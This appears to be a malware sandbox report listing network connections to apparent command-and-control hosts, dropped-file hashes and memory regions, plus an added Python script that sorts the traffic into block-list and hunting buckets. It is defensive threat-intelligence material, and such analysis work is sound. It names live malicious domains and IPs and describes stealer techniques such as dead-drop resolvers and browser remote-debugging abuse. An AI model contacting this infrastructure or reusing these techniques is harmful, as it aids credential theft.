N/A 127.0.0.1:9223 tcp
US 8.8.8.8:53 cobolrationumelawrtewarms.com udp
NL 107.189.27.66:80 cobolrationumelawrtewarms.com tcp
FR 45.155.103.183:1488 tcp
LU 45.59.120.8:80 45.59.120.8 tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 20.189.173.20:443 nw-umwatson.events.data.microsoft.com tcp
NL 149.154.167.99:443 t.me tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
US 8.8.8.8:53 drunkeflavorz.pw udp
US 104.21.31.208:443 explorebieology.run tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
RU 185.81.68.156:80 185.81.68.156 tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
RU 185.81.68.156:80 185.81.68.156 tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
RU 176.113.115.7:80 176.113.115.7 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 20.189.173.20:443 nw-umwatson.events.data.microsoft.com tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
FI 95.217.27.252:443 su.t.goldenloafuae.com tcp
US 104.21.31.208:443 explorebieology.run tcp
US 104.21.31.208:443 explorebieology.run tcp
GB 142.250.187.206:443 clients2.google.com tcp
GB 216.58.204.68:443 www.google.com tcp
GB 216.58.204.68:443 www.google.com tcp
GB 216.58.204.68:443 www.google.com tcp
US 104.21.31.208:443 explorebieology.run tcp
GB 142.250.179.225:443 clients2.googleusercontent.com tcp
GB 172.217.16.234:443 ogads-pa.googleapis.com tcp
GB 172.217.16.234:443 ogads-pa.googleapis.com udp
GB 142.250.200.46:443 play.google.com tcp
GB 142.250.200.46:443 play.google.com udp
FI 135.181.76.95:80 135.181.76.95 tcp
FI 135.181.76.95:80 135.181.76.95 tcp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.12.205:443 api.ipify.org tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
FI 135.181.76.95:80 135.181.76.95 tcp
FI 135.181.76.95:80 135.181.76.95 tcp
FI 135.181.76.95:80 135.181.76.95 tcp
FR 45.155.103.183:1488 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 40.69.146.102:443 nw-umwatson.events.data.microsoft.com tcp
US 104.21.31.208:443 explorebieology.run tcp
US 8.8.8.8:53 joyfulhezart.tech udp
US 8.8.8.8:53 hardswarehub.today udp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 hardrwarehaven.run udp
US 8.8.8.8:53 techmindzs.live udp
US 172.67.212.102:443 codxefusion.top tcp
DE 5.75.210.149:443 tcp
US 104.21.31.208:443 explorebieology.run tcp
US 8.8.8.8:53 drunkeflavorz.pw udp
US 104.21.31.208:443 explorebieology.run tcp
US 104.21.31.208:443 explorebieology.run tcp
GB 142.250.187.206:443 clients2.google.com tcp
US 8.8.8.8:53 www.google.com udp
GB 216.58.204.68:443 www.google.com tcp
GB 216.58.204.68:443 www.google.com tcp
GB 216.58.204.68:443 www.google.com tcp
GB 142.250.179.225:443 clients2.googleusercontent.com tcp
GB 172.217.16.234:443 ogads-pa.googleapis.com tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 104.40.69.76:443 nw-umwatson.events.data.microsoft.com tcp
GB 172.217.16.234:443 ogads-pa.googleapis.com udp
US 104.21.31.208:443 explorebieology.run tcp
GB 142.250.200.46:443 play.google.com udp
GB 142.250.200.46:443 play.google.com tcp
GB 142.250.200.46:443 play.google.com udp
GB 142.250.200.46:443 play.google.com tcp
US 104.21.31.208:443 explorebieology.run tcp
US 104.21.31.208:443 explorebieology.run tcp
FR 45.155.103.183:1488 tcp
US 172.67.192.128:443 biochextryhub.bet tcp
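The Network table mixes three kinds of rows: DNS queries to 8.8.8.8, connections to named hosts, and connections to bare IPs where the Domain column is empty or repeats the address. Sorting them by hand into what to block and what to hunt for is tedious, so the following is an added example, not part of the sandbox report: a parser for the flattened rows plus a summariser that strips the resolver and vendor-telemetry noise and groups the rest. NETWORK_ROWS is a constructed subset copied from the table above; the allow-list suffixes, the dead-drop and IP-lookup sets, and the bucket names are my own choices.

```python
"""IOC extraction from a flattened sandbox network table (added example)."""
import re
from typing import Dict, List

# Constructed sample: a subset of the rows in the Network table above.
NETWORK_ROWS = """\
US 8.8.8.8:53 calmingtefxtures.run udp
US 8.8.8.8:53 foresctwhispers.top udp
RU 176.113.115.6:80 176.113.115.6 tcp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
RU 176.113.115.7:80 176.113.115.7 tcp
DE 5.75.210.149:443 tcp
US 8.8.8.8:53 explorebieology.run udp
US 104.21.31.208:443 explorebieology.run tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 e5.o.lencr.org udp
GB 104.86.110.232:80 e5.o.lencr.org tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 20.42.65.92:443 nw-umwatson.events.data.microsoft.com tcp
N/A 127.0.0.1:9223 tcp
FR 45.155.103.183:1488 tcp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.12.205:443 api.ipify.org tcp
N/A 224.0.0.251:5353 udp
"""

# Country, ip:port, optional domain, proto. The domain column is absent for
# bare-IP connections, hence the optional group.
ROW_RX = re.compile(r"^(\S+)\s+(\S+):(\d+)\s+(?:(\S+)\s+)?(tcp|udp)$")
IPV4_RX = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")
RESOLVER = "8.8.8.8"
# Browser/OS background traffic seen in almost every Windows detonation (my allow-list).
NOISE_SUFFIXES = ("google.com", "googleapis.com", "googleusercontent.com",
                  "microsoft.com", "bing.net", "lencr.org")
# Public "what is my IP" services the report flags as an external IP lookup.
IP_LOOKUP = {"api.ipify.org", "ipinfo.io"}
# Legitimate services that stealers such as Vidar abuse as dead-drop resolvers:
# a profile page there carries the current C2 address. Hunt signal, not a block-list entry.
DEAD_DROP = {"steamcommunity.com", "t.me"}


def parse_rows(text: str) -> List[Dict]:
    """Turn the flattened table into dicts; rows that do not fit are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW_RX.match(line.strip())
        if not m:
            continue
        country, ip, port, domain, proto = m.groups()
        rows.append({"country": country, "ip": ip, "port": int(port),
                     "domain": domain or "", "proto": proto})
    return rows


def is_noise(domain: str) -> bool:
    return any(domain == s or domain.endswith("." + s) for s in NOISE_SUFFIXES)


def is_local(ip: str) -> bool:
    """Loopback and multicast: not external infrastructure."""
    return ip.startswith("127.") or ip.startswith("224.")


def summarize(rows: List[Dict]) -> Dict[str, list]:
    """Group external endpoints into block-list and hunt buckets."""
    def endpoint(r: Dict) -> str:
        return f'{r["ip"]}:{r["port"]}'

    queried = {r["domain"] for r in rows if r["ip"] == RESOLVER and r["domain"]}
    connected = {r["domain"] for r in rows
                 if r["ip"] != RESOLVER and r["domain"] and not IPV4_RX.fullmatch(r["domain"])}
    bare_ip = sorted({endpoint(r) for r in rows
                      if r["ip"] != RESOLVER and not is_local(r["ip"])
                      and (not r["domain"] or IPV4_RX.fullmatch(r["domain"]))})
    odd_ports = sorted({endpoint(r) for r in rows
                        if r["proto"] == "tcp" and r["port"] not in (80, 443)
                        and not is_local(r["ip"])})
    loopback_ports = sorted({r["port"] for r in rows if r["ip"].startswith("127.")})
    return {
        # Queried but never connected to: candidates for a fallback domain list
        # whose entries did not resolve at detonation time (interpretation, not fact).
        "dns_only": sorted(d for d in queried - connected if not is_noise(d)),
        "c2_domains": sorted(d for d in connected
                             if not is_noise(d) and d not in IP_LOOKUP and d not in DEAD_DROP),
        "dead_drop": sorted(connected & DEAD_DROP),
        "ip_lookup": sorted(connected & IP_LOOKUP),
        "bare_ip": bare_ip,
        "odd_ports": odd_ports,
        # 127.0.0.1:9223 matches the --remote-debugging-port the browsers were launched with.
        "loopback_ports": loopback_ports,
    }


if __name__ == "__main__":
    import json
    print(json.dumps(summarize(parse_rows(NETWORK_ROWS)), indent=2))
```

Everything in bare_ip, odd_ports, c2_domains and dns_only can go straight onto a block-list; the plaintext HTTP to 176.113.115.6 and 176.113.115.7 and the TCP/1488 session to 45.155.103.183 are the strongest entries. dead_drop and ip_lookup are hunting signals only, because blocking Steam, Telegram or ipify outright would break legitimate use; correlate them with the process that made the connection instead. The loopback port is not an IOC to block but a host-side artefact: a browser listening on 9223 on a user workstation is a cheap detection for this technique.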

Files

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1p75e5.exe

MD5 a92d6465d69430b38cbc16bf1c6a7210
SHA1 421fadebee484c9d19b9cb18faf3b0f5d9b7a554
SHA256 3cdb245eb031230d5652ea5a1160c0cbbb6be92fb3ea3cf2ee14b3d84677fc77
SHA512 0fc65c930a01db8cf306252402c47cf00b1222cd9d9736baf839488cdd6cf96ae8be479e08282ec7f34b665250580466a25cdfc699f4ecef6d5e4d543db8c345

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2d1728.exe

MD5 75feb5227095b1fdb72953933df3e907
SHA1 82c65fd8b1b296003dea002dd0a640a23063fb23
SHA256 6d4e4eafdd4a46ea7c96557580c7c39f1d850bb0b6ed1ddfaf884ea7b675df65
SHA512 c9406d2e563b34003950a767331c2673d3e823a24c2a713dff33db2c43df818b7dfcfafe6e62794bff6efdddfd9e0e3f3627117148ecdfb182434047c882a418

memory/3528-20-0x00000000009E0000-0x0000000000CEF000-memory.dmp

memory/3528-23-0x00000000009E0000-0x0000000000CEF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe

MD5 b60779fb424958088a559fdfd6f535c2
SHA1 bcea427b20d2f55c6372772668c1d6818c7328c9
SHA256 098c4fe0de1df5b46cf4c825e8eba1893138c751968fcf9fe009a6991e9b1221
SHA512 c17a7781790326579669c2b9ad6f7f9764cf51f44ad11642d268b077ade186563ae53fc5e6e84eb7f563021db00bef9ebd65a8d3fbe7a73e85f70a4caa7d8a7f

memory/3996-38-0x0000000000A00000-0x0000000000A60000-memory.dmp

memory/3996-39-0x00000000057A0000-0x0000000005D44000-memory.dmp

memory/1196-41-0x0000000000400000-0x0000000000429000-memory.dmp

memory/1196-43-0x0000000000400000-0x0000000000429000-memory.dmp

memory/1196-45-0x0000000000400000-0x0000000000429000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe

MD5 9dadf2f796cd4500647ab74f072fd519
SHA1 92b6c95a6ed1e120488bd28ac74274e874f6e740
SHA256 e5f73330a51f34981205988aa6bbd82797a8d2d1e2ef1a605aa90baa3a806d76
SHA512 fd9f14321805f6bfef8fa2c81e11c5c96a7246acbc70fb9c86e6a59d9e650353231ddca0c30d3c0db69cbee1c219c5ca416a6f9f691edeebbec114e997fc574d

memory/4532-59-0x0000000000830000-0x0000000000CDC000-memory.dmp

memory/4532-95-0x0000000000830000-0x0000000000CDC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe

MD5 001d7acad697c62d8a2bd742c4955c26
SHA1 840216756261f1369511b1fd112576b3543508f7
SHA256 de53f6f359af6ccc361faf2aa74690c9575b987a01f1250a6eb042cf9d4ea4af
SHA512 f06039d1d7ad28a04877e4eabb6fb7a5137a0040b8c316bee502bce6c68058bfe62db9480674bb69c9aeabae34304adeeff86dc3a8427929d00a842d2f2e80eb

C:\Windows\Temp\{CF76D235-72E8-4901-A72C-4281AFB358A0}\.cr\z3SJkC5.exe

MD5 eff9e9d84badf4b9d4c73155d743b756
SHA1 fd0ad0c927617a3f7b7e1df2f5726259034586af
SHA256 d61ef1bfa73bd5b013066d86f1c41e33bb396fc547cf5ab7191f56cc7b463aad

memory/6124-2613-0x00000000054D0000-0x0000000005824000-memory.dmp

memory/6124-2614-0x0000000005B10000-0x0000000005B5C000-memory.dmp

memory/6212-2638-0x0000000005AA0000-0x0000000005DF4000-memory.dmp

memory/6212-2642-0x0000000006240000-0x000000000628C000-memory.dmp

memory/8688-3349-0x0000000000BB0000-0x0000000001070000-memory.dmp

memory/8688-3352-0x0000000000BB0000-0x0000000001070000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\51464eef-87d5-42e0-b35e-f92a958fbfba.dmp

MD5 caf8749e13cb50d5b5f8b7e68ac8cd01
SHA1 24e7cdb2b1551b7a7f01774ef088eadd91803b6b
SHA256 4db050c8d8c18b43e56b072b607929fbb6c661ef31f0513a03ee39584cafc01b
SHA512 8939d86f65ced3ee68be9edab85a766df0b20e64fa28cd42d213e97aec0c3d80b2919f696a13add41213d6fb6157068a79a22d3458965fee7044f148c761bd69

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 49af9a2062e3158bb62b81805b3a97ff
SHA1 6e62135b551970505dcc07c085e723692fb0fb8d
SHA256 0ec3f98859dce9af62678bb6a936c13eddbcac5da74ad3489cef82c513d29f75
SHA512 77d30d3ca3228e379636aa3fc06f989597274acb4c4c5bdf8bce2af26d8cda49b434e2555ffca028f723b67f9472537540ef9d5a80a910e11aea36c620432e56

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 de7819b11d5926e52ec1fc5800d57c28
SHA1 48df2d465440f5480119832f5d485ebc7417466b
SHA256 093ded9f9a1f04ca46dc13d94b9846f11e7a358bb33bd7f52c6c6ee2858762fb
SHA512 5148bf56d5b1676d7fef22ce6e061f1f238e2afd9277021294fe6d4a7b464db63f45d60c4b68428ce4809b469947918339aa5e4592b6f98916c59d4244b9b24f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 e4f24f89ab7f5cef79fa242b6ea41e7b
SHA1 8269854d5283bd5f1e4141708b1c3da44c91158a
SHA256 d41c1b37ad844a9f294d0e0785b7cc3d6b5423db4d3b11b44d48d14ccacd0010
SHA512 ea404468a60f03fc3e515f90f4dca3de622c80c3aad6cc8a0ecc010eb243fd6dc150fc6afd244f758c4fd2bc10d6acbcb0a3ac463ed3845f14a37aac2ba0c1b3

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 d3b69e50a5bf60987fa2b0ce558e9b94
SHA1 1586eed3720936ba16377da6af952a9a612933ef
SHA256 ea0dca356bbab518b810254b975e6200332a7896d3771d397c8dd1ce85ee4838
SHA512 41e814a0ff746ed7f36038b02e891195aa451666f71cbcdf85bc78e6ed14d9f9019489e2008d8775b536d97bfeb22cd1bbdd64f1e06ddb3407a1990ce9673c00

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 76c8092516d42d7685534edaab8137e4
SHA1 29c3e9275b7a1c90d93989a3bb16413b3396a333
SHA256 94d4814dffa62b2be7310fedd3038d17c4775f111d2e3c19d19400112b231554
SHA512 02648f4344a3c50a37b413c8b7fc523797db9da63d5ff3b2867f6e5aace20d86fb3dd903e2f2cba9c14c2da98e0626f92a7406eb4b098e426ceac7f487d676ec

memory/6364-3481-0x00007FF6431B0000-0x00007FF64324F000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\reports\752084e7-4993-41de-9e2f-661c97c75a24.dmp

MD5 5e2a708942ae88ad52f2e059f7c8cc86
SHA1 3d36ba0923446dfe3e125777a6e9611b9359105d
SHA256 534cc34cc0c08739b01f47c08625aab1996152f1aa3b7ecde51f9a369e01369b
SHA512 dc0556de62c5583bca4186273fd5beaa20af9ff14103988319eb948a938e89275f162ab2da4e8b9ebaa8d1479f34b9f3d433c61b35026574164b7d3ceec632d9

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\metadata

MD5 99ff0ee952df8c04f6e82f7d0fbf3339
SHA1 4e20a1dc56bdfa3fb4b8cd3d3d0a2b82fda8381b
SHA256 33b3023f45a530ce0fa209a2da9514b1f47e493439f8d2eb52a34348bdf8893e
SHA512 7b8d3a00bb1b8a4f19e4a616c68e8d724af193997c22950f0f11cb2625e9b0bf6690de59921d234d5388b0eabea58df125d02d317c0923f38f6c5e5a10d54939

memory/8516-3613-0x00000000003C0000-0x000000000085B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\scoped_dir6832_2060289526\CRX_INSTALL\manifest.json

MD5 b0422d594323d09f97f934f1e3f15537
SHA1 e1f14537c7fb73d955a80674e9ce8684c6a2b98d
SHA256 401345fb43cb0cec5feb5d838afe84e0f1d0a1d1a299911d36b45e308f328f17
SHA512 495f186a3fe70adeaf9779159b0382c33bf0d41fe3fe825a93249e9e3495a7603b0dd8f64ca664ea476a6bafd604425bf215b90b340a1558abe2bf23119e5195

C:\Users\Admin\AppData\Local\Temp\scoped_dir6832_2060289526\CRX_INSTALL\_locales\en_US\messages.json

MD5 64eaeb92cb15bf128429c2354ef22977
SHA1 45ec549acaa1fda7c664d3906835ced6295ee752
SHA256 4f70eca8e28541855a11ec7a4e6b3bc6dd16c672ff9b596ecfb7715bb3b5898c
SHA512 f63ee02159812146eee84c4eb2034edfc2858a287119cc34a8b38c309c1b98953e14ca1ca6304d6b32b715754b15ba1b3aa4b46976631b5944d50581b2f49def

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 b274323e60ab420b536dbd574e86dcee
SHA1 2a10b1f2ccce3d2cedc4df01fee7736e88dc1b31
SHA256 a5b6c0c3322fe9e3a01b15762ed86a31a97dade09e4c6b71d0b110d114784d81
SHA512 2bc7063547bf2a7381bdd98edf1eaf9b92a772770e5e876a22629380bf5fe10e9291287e14020d388ab5e6e2bd7cb10aebf0883c2abd576456dab44255d0cf43